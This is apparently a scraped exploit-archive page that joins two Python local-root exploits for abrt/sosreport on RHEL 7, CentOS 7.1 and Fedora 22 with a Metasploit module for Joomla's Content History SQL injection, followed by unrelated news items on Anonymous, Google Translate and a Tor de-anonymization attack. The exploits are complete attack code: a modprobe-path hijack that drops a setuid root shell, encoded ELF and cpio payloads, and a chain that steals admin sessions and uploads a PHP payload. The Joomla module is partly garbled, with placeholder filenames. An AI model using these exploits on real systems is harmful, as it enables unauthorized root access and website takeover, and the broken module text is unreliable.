

RHEL 7.0 / 7.1 abrt / sosreport Local Root

#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
 
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport:  sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release 
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
 
import os,sys,glob,time,sys,socket
 
# Stage 1 of the abrt/sosreport race described in the header (CVE-2015-5287):
# fork a throwaway child and crash it so that abrt opens a dump directory for
# it under /var/tmp/abrt (see the glob further down) and starts sosreport
# inside that directory. The rest of the script assumes that sosreport run
# happens with root privileges — the premise of "local root" in the header,
# not something this code can verify.
#
# Defender footprint: a SIGSEGV delivered by the user to a freshly forked
# /usr/bin/sleep, immediately followed by renames and symlink creation inside
# the abrt dump directory, is what this stage looks like on a host.
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"  # what the root-run helper executes later: copies /bin/sh to /tmp/sh with setuid+setgid bits

pid = os.fork()

if pid == 0:
    # child: just needs to exist long enough to be crashed by the parent
    os.execl("/usr/bin/sleep","sleep","100")

time.sleep(0.5)  # give the child time to exec before it is signalled

print "crashing pid %d" % pid

os.kill(pid,11)  # signal 11 = SIGSEGV -> core dump -> abrt's ccpp hook picks it up

print "waiting for dump directory"
 
def waitpath(p):
    """Block until glob pattern *p* matches at least one path, then return the matches.

    Polls every 50 ms; never gives up on its own, so a pattern that can never
    match hangs the caller forever.
    """
    matches = glob.glob(p)
    while not matches:
        time.sleep(0.05)
        matches = glob.glob(p)
    return matches
 
# Stage 2: wait for abrt's dump directory for the crashed pid
# (/var/tmp/abrt/cc*<pid>), then for the sosreport working directory that
# appears inside it while sosreport is still running.
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]

print "dump directory: ", dumpdir

os.chdir(dumpdir)

print "waiting for sosreport directory"

sosreport = waitpath("sosreport-*")[0]

print "sosreport: ", sosreport

print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")  # sosreport's own temp files, created next to its directory

print "tmpfiles: ", tmpfiles

print "moving directory"

# Race: swap sosreport's working directory for a user-controlled, world-writable
# one while sosreport is still running. The two log files it will write
# (sos_logs/sos.log and sos_logs/ui.log) are pre-created as symlinks to
# /proc/sys/kernel/modprobe, so a privileged write to either log lands in the
# kernel's modprobe helper path instead of a log file.
#
# Defender notes: symlinks under */sosreport-*/sos_logs/ pointing outside the
# dump directory, or mode-0777 directories appearing inside /var/tmp/abrt/,
# are direct indicators of this technique; an integrity check (or audit
# watch) on /proc/sys/kernel/modprobe catches the outcome.
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)

os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)

os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")

print "moving tmpfiles"

# Replace each temp file with a world-writable one whose only content is the
# path /tmp/hax.sh. The poll at the end of the script expects that string to
# reach the modprobe path through the log symlinks above; the exact path it
# takes inside sosreport is not visible in this script.
# The file object returned by open() is never closed explicitly; CPython 2
# closes it when the temporary is dropped at the end of the statement, so the
# write is flushed before chmod runs.
for x in tmpfiles:
    print "%s -> %s" % (x,x + ".old")
    os.rename(x, x + ".old")
    open(x, "w+").write("/tmp/hax.sh\n")
    os.chmod(x,0666)


os.chdir("/")  # leave the dump directory so it can be removed later

# progress dots (below) go to stderr, messages go to stdout
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
 
 
def trigger():
    """Final stage, called once /proc/sys/kernel/modprobe points at /tmp/hax.

    Writes `payload` to /tmp/hax.sh, makes the kernel run its modprobe helper
    (now that script) as root, then execs the setuid shell the script leaves in
    /tmp/sh. Never returns: every path ends in os.execl or sys.exit.
    """
    open("/tmp/hax.sh","w+").write(payload)
    os.chmod("/tmp/hax.sh",0755)
    # AF_INET socket with protocol 132 (IPPROTO_SCTP). When the protocol's
    # module is not loaded the kernel invokes the configured modprobe helper,
    # which is the mechanism that gets /tmp/hax.sh executed with root
    # privileges. The socket() call itself is expected to fail here, hence
    # the swallowed exception.
    try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
    except: pass
    time.sleep(0.5)  # let the helper finish before checking its side effect
    try:
        os.stat("/tmp/sh")  # presence of /tmp/sh == payload ran
    except:
        print "could not create suid"
        sys.exit(-1)
    print "success"
    # sh -p keeps the effective uid. The command restores the default helper
    # path (/sbin/modprobe), removes the setuid copy and hands over a root
    # bash. Defenders: /tmp/sh with mode 6755 and a non-default
    # /proc/sys/kernel/modprobe value are the artifacts to alert on.
    os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
    sys.exit(-1)
 
# Poll the kernel's modprobe helper path once per second for up to 600 s,
# waiting for the privileged write set up above to land. trigger() never
# returns, so reaching the final print means the race was lost this run.
# The expected benign value of this file is /sbin/modprobe (the value
# trigger() restores); anything else is a strong compromise indicator.
for x in xrange(0,60*10):
    if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
        print "done"
        trigger()
    time.sleep(1)
    sys.stderr.write(".")

print "timed out"



CentOS 7.1 / Fedora 22 abrt Local Root

#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------
 
# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release 
# CentOS Linux release 7.1.1503 (Core) 
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
 
 
import time,os,datetime,sys,resource,socket
 
 
# Distribution switch: the abrt spool directory differs between Fedora
# (/var/tmp/abrt) and CentOS/RHEL (/var/spool/abrt); see the replace below and
# the `sym` path later in the script.
fedora = "Fedora" in open("/etc/redhat-release").read()

# Recipe the two archives below were produced with:
# mkdir dir1
# ln -s /var/spool/abrt dir1/hax
# mkdir dir2
# mkdir dir2/hax
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
# cd dir1
# find . -depth -print | cpio -o > ../cpio1
# cd ../dir2
# find . -depth -print | cpio -o > ../cpio2

# Pre-built cpio archives, zlib-compressed (the "zip" codec is Python 2 only).
# Per the recipe: cpio1 holds a symlink hax -> /var/spool/abrt, cpio2 holds
# hax/abrt-hax-coredump -> /proc/sys/kernel/modprobe. Unpacking cpio2 into a
# directory where cpio1 was already unpacked therefore creates a symlink named
# abrt-hax-coredump inside the abrt spool directory.
cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")

if fedora:
    # Both paths are 15 bytes, so the substitution leaves the cpio record
    # layout (name length field) intact — presumably why the triple slash is used.
    cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"  # executed later as the kernel's modprobe helper: drops a setuid+setgid copy of /bin/sh
 
 
# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end

# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp

# Pre-assembled 32-bit static ELF (zlib-compressed), built from the nasm source
# quoted below: it overwrites its own stack with the string '////////tmp/hax.sh'
# and then jumps to 0x41414141 to fault deliberately.
elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")
 
# most people don't have nasm installed so i preassembled it
# if you're not brave enough to run the preassembled file, here's the code :)
 
# Bare string literal holding the nasm source for the `elf` blob above. It is an
# expression statement with no runtime effect — documentation only.
"""
; abrt-hax.asm
; nasm -f bin -o abrt-hax abrt-hax.asm
BITS 32
                org     0x08048000
ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1, 0         ;   e_ident
        times 8 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      1                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx
  ehdrsize      equ     $ - ehdr
  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      5                               ;   p_flags
                dd      0x1000                          ;   p_align
  phdrsize      equ     $ - phdr

_start:
inc esp
cmp dword [esp],0x706d742f
jne l
or esp,0xfff
inc esp
mov edx,500
l3:
mov ecx,msglen
mov ebx,message
sub esp,ecx
l2:
mov al,[ebx]
mov [esp],al
inc esp
inc ebx
loop l2
sub esp,msglen
dec edx
cmp edx,0
jne l3
mov eax,0x41414141
jmp eax
message         db      '////////tmp/hax.sh',0x0a,0
msglen          equ     $-message
"""



# GNU build-id of /usr/bin/hostname, taken as the last token of the last line
# of `eu-readelf -n` output. Fragile: assumes the build-id note is printed
# last and that elfutils is installed (no error handling if it is not).
# The value is written to /tmp/build_ids; the privileged helper started in
# child() is presumably what consumes it from its cwd (/tmp) — inferred, the
# helper's input format is not visible here.
build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]

os.chdir("/tmp")


open("build_ids","w+").write(build_id + "\n")

print build_id
 
 
def child():
    """Child side of each helper run; never returns (ends in os.execl).

    Pre-creates the temp directory the privileged debuginfo helper is expected
    to use, with its `unpacked.cpio` entry replaced by a symlink to the fifo at
    /var/tmp/haxfifo, then execs the helper (CVE-2015-5273 per the header:
    insecure temp-directory usage).
    """
    timestamp = int(time.time())

    # Three candidate names cover this second and the next two, because the
    # helper takes its own timestamp a little later than we do. The directory
    # name format is inferred from the helper — confirm against abrt's source
    # if it ever stops matching. os.getpid() is this child's pid, which the
    # exec below preserves, so the helper's pid matches the names created here.
    for i in xrange(0,3):
        try:
            t = datetime.datetime.fromtimestamp(timestamp+i)
            d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
            os.mkdir(d)
            os.chmod(d,0777)
            os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
            print "created %s" % d
        except: pass  # e.g. directory left over from a previous run; silently skipped

    # Defender note: /var/tmp/abrt-tmp-debuginfo-* directories with mode 0777
    # and a symlinked unpacked.cpio are the artifacts this stage leaves behind.
    os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")
 
# World-writable FIFO that stands in for the helper's unpacked.cpio (see child()
# and fifo()). Errors are ignored so a fifo left over from an earlier run is reused.
try:
    os.mkfifo("/var/tmp/haxfifo")
    os.chmod("/var/tmp/haxfifo",0666)
except:
    pass
 
def fifo(a):
    """Drain the fifo, then push the archive *a* into it.

    Each open() blocks until the other end (presumably the privileged helper,
    which sees the fifo as its unpacked.cpio) opens the file too: the first
    read consumes whatever the helper writes out, the second write supplies our
    crafted archive when the helper reads the file back. The order of the two
    opens is the whole point; do not reorder.
    """
    print "reading from fifo.."
    open("/var/tmp/haxfifo").read()
    print "done"

    print "writing to fifo.."
    open("/var/tmp/haxfifo","w+").write(a)  # handle closed implicitly when the temporary is dropped
    print "done"
 
# Run 1: start the privileged helper (child) and feed it cpio1 through the fifo.
# Per the cpio recipe above, unpacking it plants hax -> <abrt spool dir> in the
# helper's temp directory.
if os.fork() == 0: child()

print "first cpio..."
fifo(cpio1)

os.wait()
time.sleep(1)

# Run 2: same again with cpio2; unpacked through the hax symlink it should
# leave abrt-hax-coredump -> /proc/sys/kernel/modprobe inside the spool dir.
if os.fork() == 0: child()
print "second cpio..."
fifo(cpio2)

os.wait()
time.sleep(1)

if fedora:
    sym = "/var/tmp/abrt/abrt-hax-coredump"
else:
    sym = "/var/spool/abrt/abrt-hax-coredump"

# lstat, not stat: only the existence of the link itself matters here.
try:
    os.lstat(sym)
except:
    print "could not create symlink"
    sys.exit(-1)

print "%s created" % sym

# Write the pre-assembled crasher and run it with an unlimited core limit, an
# empty argv[0] and an empty environment (the asm inspects the top of its own
# stack; extra argv/envp strings would shift that layout). /tmp/abrt-hax is
# left behind on disk afterwards.
open("/tmp/abrt-hax","w+").write(elf)
os.chmod("/tmp/abrt-hax",0755)

if os.fork() == 0:
    resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
    print "executing crashing process.."
    os.execle("/tmp/abrt-hax","",{})

os.wait()
time.sleep(1)   

# abrt-hook-ccpp (running as root) is expected to write the core to
# <spool>/abrt-hax-coredump, i.e. through the symlink into
# /proc/sys/kernel/modprobe (CVE-2015-5287 per the header). Defenders: a
# modprobe helper path other than /sbin/modprobe, or symlinks inside the abrt
# spool directory, are the indicators to alert on.
if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
    print "could not modify /proc/sys/kernel/modprobe"
    sys.exit(-1)

open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)

# AF_INET socket with protocol 132 (IPPROTO_SCTP): when the protocol module is
# not loaded the kernel runs its modprobe helper — now /tmp/hax.sh — as root.
# The socket() call itself is expected to fail, hence the swallowed exception.
try:
    socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except:
    pass

time.sleep(0.5)

# presence of /tmp/sh (setuid copy of /bin/sh) == payload ran
try:
    os.stat("/tmp/sh")
except:
    print "could not create suid"
    sys.exit(-1)

print "success"
 
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python



Joomla Content History SQL Injection Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
##
# Joomla Content History SQLi -> admin session hijack -> template file write.
# Flow, as visible below: (1) an injection naming a random, non-existent table
# makes the backend answer HTTP 500 with an error that leaks the real table
# prefix; (2) the same injection with the real prefix leaks a Super User
# session id through a MySQL "Duplicate entry" error; (3) the *name* of the
# session cookie is taken from an unauthenticated /administrator request and
# its value replaced by the leaked id; (4) the template editor is used to
# create a .php file, fill it with the payload, and request it.
#
# Detection notes: GET index.php?option=com_contenthistory&view=history with a
# list[select] parameter containing SQL; HTTP 500 replies carrying "Duplicate
# entry" text; POSTs with task=template.createFile / template.apply from a
# session that never passed the login form; new .php files under /templates/.
##
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Content History SQLi Remote Code Execution",
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in Joomla versions
        3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
        component in the core of Joomla. Triggering the SQL injection makes it possible
        to retrieve active Super User sessions. The cookie can be used to login to the
        Joomla administrator backend. By creating a new template file containing our
        payload, remote code execution is made possible.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Asaf Orpani', # Vulnerability discovery
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7857' ], # Admin session hijacking
          [ 'CVE', '2015-7297' ], # SQLi
          [ 'CVE', '2015-7857' ], # SQLi — NOTE: duplicates the first entry; presumably one of the two ids is a typo in the original module
          [ 'CVE', '2015-7858' ], # SQLi
          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
          [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 3.x <= 3.4.4', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 23 2015",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
        ], self.class)

  end

  # Vulnerability check: inject a random table name and look for the
  # `<prefix>_ucm_history` table name in the error body. Note that, unlike
  # exploit(), this does not require the status code to be 500.
  def check

    # Request using a non-existing table
    res = sqli(rand_text_alphanumeric(rand(10)+6))

    if res && res.body =~ /`(.*)_ucm_history`/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe

  end


  # Send the error-based injection through the list[select] parameter of the
  # com_contenthistory view and return the raw response (or nil on failure).
  # tableprefix is interpolated verbatim into the query; callers pass either a
  # random string (to provoke an error that leaks the prefix) or the real
  # prefix followed by "_".
  def sqli( tableprefix )

    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.

    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"

    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'vars_get' => {
        'option' => 'com_contenthistory',
        'view' => 'history',
        'list[ordering]' => '',
        'item_id' => '1',
        'type_id' => '1',
        'list[select]' => sql
        }
      })

    return res

  end


  # Full chain; every step fail_with()s on an unexpected response, so the
  # variables set in one step are always defined by the time the next uses them.
  def exploit

    # Request using a non-existing table first, to retrieve the table prefix
    res = sqli(rand_text_alphanumeric(rand(10)+6))

    if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
      table_prefix = $1
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
    end

    # Retrieve the admin session using our retrieved table prefix
    res = sqli("#{table_prefix}_")

    # The duplicated key reported by MySQL is the session id with the
    # floor(rand(0)*2) digit appended; [0...-1] strips that last character.
    if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/
      auth_cookie_part = $1[0...-1]
      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
    else
      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
    end

    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php")
    })

    # Only the cookie *name* is kept; its value is replaced below.
    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
      cookie_begin = $1
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
    end

    # Modify cookie to authenticated admin
    # NOTE: `<<` appends in place, so cookie_begin is mutated as well (harmless
    # here because it is not used again, but a trap if this code is reused).
    auth_cookie = cookie_begin
    auth_cookie << "="
    auth_cookie << auth_cookie_part
    auth_cookie << ";"

    # Authenticated session
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie
      })

    if res && res.code == 200 && res.body =~ /Administration - Control Panel/
      print_status("#{peer} - Successfully authenticated as Administrator")
    else
      fail_with(Failure::Unknown, "#{peer} - Session failure")
    end


    # Retrieve template view
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'templates'
        }
      })

    # We try to retrieve and store the first template found
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
      template_id = $1
      file_id = $2
    else
      fail_with(Failure::Unknown, "Unable to retrieve template")
    end

    filename = rand_text_alphanumeric(rand(10)+6)

    # Create file
    # NOTE(review): the literal "#(unknown).php" used from here on does not match
    # the `filename` sent in this POST; it looks like a transcription artifact in
    # this copy of the module rather than intended behaviour.
    print_status("#{peer} - Creating file [ #(unknown).php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'task' => 'template.createFile',
        'id' => template_id,
        'file' => file_id,
        },
      'vars_post' => {
        'type' => 'php',
        'name' => filename
      }
      })

    # Grab token
    if res && res.code == 303 && res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to [ #{location} ]")
      res = send_request_cgi(
        'uri'    => location,
        'method' => 'GET',
        'cookie' => auth_cookie
      )

      # Retrieving template token
      if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
        token = $1
        print_status("#{peer} - Token [ #{token} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
      end

      # The template's web path is needed later to request the dropped file.
      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
        template_path = $1
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
      end

    else
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
    end

    filename_base64 = Rex::Text.encode_base64("/#(unknown).php")

    # Inject payload data into file
    print_status("#{peer} - Insert payload into file [ #(unknown).php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'template',
        'id' => template_id,
        'file' => filename_base64,
        },
      'vars_post' => {
        'jform[source]' => payload.encoded,
        'task' => 'template.apply',
        token => '1',
        'jform[extension_id]' => template_id,
        'jform[filename]' => "/#(unknown).php"
      }
      })

    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
      print_status("#{peer} - Payload data inserted into [ #(unknown).php ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #(unknown).php ]")
    end

    # Request payload
    # The dropped file is registered for cleanup (FileDropper) before it is
    # requested; the response of the final request is not inspected.
    register_files_for_cleanup("#(unknown).php")
    print_status("#{peer} - Executing payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, template_path, "#(unknown).php"),
      'cookie'  => auth_cookie
    })

  end

end



Anonymous ‘declares war’ on Islamic State

Anonymous 'declares war' on Islamic State

Anonymous is promising its "biggest operation ever" against Islamic State militants (IS).

The hacking group "declared war" against the extremists after the attacks in Paris on Friday.
In a YouTube video, a spokesman wearing the group's signature mask said they would use their knowledge to "unite humanity".
Speaking French he warned IS members to "expect us", saying "Anonymous from all over the world will hunt you down".

The group made similar threats after the Charlie Hebdo attacks in France earlier this year.
It's since claimed to have disabled thousands of IS-linked social media accounts.
So what happens now? We've asked technology expert Dan Simmons from BBC Click and Charlie Winter, a security analyst specialising in IS, to shed some light.

What does 'declaring war' mean?

"It means we're likely to see attacks on the IS website, any related websites, recruitment sites, social media and if Anonymous goes down the hacking route this time, it could mean communications disrupted too," says Dan.
"They'll also be reporting accounts sympathetic to IS to social media firms and they're encouraging members of the public to help," he adds.

Charlie says it's all about "disrupting" IS.

"In the past it's been limited to getting accounts suspended, getting content taken down, identifying IP addresses," he says.
"But it's disruption rather than meaningful challenge. It won't solve the problem. It'll be interesting to see if it goes further than they have before."

How badly could this hurt IS?

"It won't solve the problem," says Charlie. "But as a disruptive influence it does help close down some of the IS publicity machine."
"The big recruitment accounts usually pop back up quickly but it's important to challenge the spaces these people have monopolised.
"These accounts are very important for IS."

But Dan thinks Anonymous has the potential to cause more disruption than it has in the past.

"It depends how much time IS members have got. Are they going to be putting up their website again and are they going to be putting up their social media again?
"If so, who is more resilient, them or Anonymous?" he asks.
"The hackers have said in their statement they will vigorously attack and they will attack without end. So yes, they can put their sites back up but it's a huge amount of disruption."

Could it make things more difficult for the security services?

"This action will concern the security services," claims Dan.
"Security officials can take down any website - but they don't. And that's because they're able to track people who use them.
"Those people who are most serious - potential attackers - will usually manipulate their computer's identities to avoid detection.
"But having these sites removed could mean missing an opportunity to flag extremists at an early stage."

Charlie doesn't think security services will be too worried though.

"It's very rare you get decent intelligence among people tweeting or speaking openly," he says.
Is Anonymous just looking for its own publicity?

Charlie believes there's "real intent there to damage IS".

"Having seen them declare this war a number of times, there is a surge of activity after," he says.
"They do gather a lot of dangerous accounts and have them suspended so I think it's really positive."

Fonte: http://www.bbc.co.uk/newsbeat/article/34836400/anonymous-declares-war-on-islamic-state


Traduttore Google, eliminato ‘Inchallah’

Traduttore Google, eliminato Inchallah

(ANSA) - ROMA, 16 NOV
E' stata riparata l'anomalia di Google Translate, che lunedì pomeriggio traduceva dall'italiano in qualsiasi lingua la frase "Ci rivedremo presto" con "Inchallah", parola araba che sta per "sia fatta la volontà di Allah".
Lo conferma un portavoce di Google Italia.
Nessun dettaglio è stato fornito sulle cause dell'evento, né da dove si sia originato.

Fonte: ANSA / http://tecnologia.tiscali.it


Why the attack on Tor matters

Why the attack on Tor matters

On Wednesday, Motherboard posted a court document filed in a prosecution against a Silk Road 2.0 user indicating that the user had been de-anonymized on the Tor network thanks to research conducted by a "university-based research institute."

As Motherboard pointed out, the timing of this research lines up with an active attack on the Tor network that was discovered and publicized in July 2014. Moreover, the details of that attack were eerily similar to the abstract of a (withdrawn) BlackHat presentation submitted by two researchers at the CERT division of Carnegie Mellon University (CMU).

A few hours later, the Tor Project made the allegations more explicit, posting a blog entry accusing CMU of accepting $1 million to conduct the attack. A spokesperson for CMU didn't exactly deny the allegations but demanded better evidence and stated that he wasn't aware of any payment. No doubt we'll learn more in the coming weeks as more documents become public.

